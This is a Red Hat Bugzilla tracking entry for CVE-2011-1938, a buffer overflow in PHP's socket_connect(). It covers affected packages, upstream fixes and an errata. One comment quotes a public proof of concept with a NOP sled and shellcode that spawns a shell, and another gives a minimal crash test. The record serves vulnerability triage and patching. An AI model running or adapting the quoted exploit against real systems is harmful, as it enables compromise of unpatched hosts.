Bug 709067 (CVE-2011-1938)
Summary: | CVE-2011-1938 php: stack-based buffer overflow in socket_connect() | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | David Kutálek <dkutalek> |
Severity: | low | Docs Contact: | |
Priority: | low | ||
Version: | unspecified | CC: | bressers, dkutalek, fedora, jorton, rpm, vdanen |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | php 5.3.7 | Doc Type: | Bug Fix |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2011-11-02 23:14:33 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 740731, 740732, 740733, 740734, 831135 | ||
Bug Blocks: | 715030 |
Description
Jan Lieskovsky
2011-05-30 14:01:58 UTC
This issue did not affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5. This issue affects the versions of the php53 package, as shipped with Red Hat Enterprise Linux 5. This issue affects the versions of the php package, as shipped with Red Hat Enterprise Linux 6. -- This issue affects the versions of the php package, as shipped with Fedora release of 13, 14 and 15. Public PoC (from [1]): ====================== POC popping a shell: -- cut -- <?php echo "[+] CVE-2011-1938"; echo "[+] there we go...\n"; define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3"); define('EVIL_SPACE_SIZE', 1024*1024*8); $SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0". "\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1". "\xcd\x80"; echo "[+] creating the sled.\n"; $CODE = str_repeat("\x90", EVIL_SPACE_SIZE); for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; $i < strlen($SHELLCODE) ; $i++, $j++) { $CODE[$j] = $SHELLCODE[$i]; } $b = str_repeat("A", 196).EVIL_SPACE_ADDR; $var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); echo "[+] popping shell, have fun (if you picked the right address...)\n"; $var85 = socket_connect($var79,$b); ?> -- cut -- As noted above, this issue did not affect php packages in Red Hat Enterprise Linux 4 and 5. This problem was introduced in the following commit: http://svn.php.net/viewvc?view=revision&revision=262814 http://bugs.php.net/bug.php?id=44127 It affects php53 packages in Red Hat Enterprise Linux 5 and php packages in Red Hat Enterprise Linux 6. As mentioned above, this overflow is caught by FORTIFY_SOURCE in both affected versions. This reduces impact of this issue to a crash / abort and blocks code execution. The impact is further reduced by the fact that this problem affects AF_UNIX sockets. It's lot less likely for a PHP script to accept arbitrary untrusted address (file path) when connecting using AF_UNIX socket, than when doing a network connection using AF_INET or AF_INET6 sockets. (In reply to comment #0) > Upstream patch: > [3] http://svn.php.net/viewvc?view=revision&revision=311369 Correction of the above commit: http://svn.php.net/viewvc?view=revision&revision=311370 (In reply to comment #3) > Public PoC (from [1]): Minimal test case without any payload, that can be use to verify the problem can look as: <?php $sock = socket_create(AF_UNIX, SOCK_STREAM, 1); var_dump(socket_connect($sock, str_repeat('A', 1024*1024))); ?> This is corrected in upstream 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1 This issue has been addressed in following products: Red Hat Enterprise Linux 5 Red Hat Enterprise Linux 6 Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html Statement: Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php). |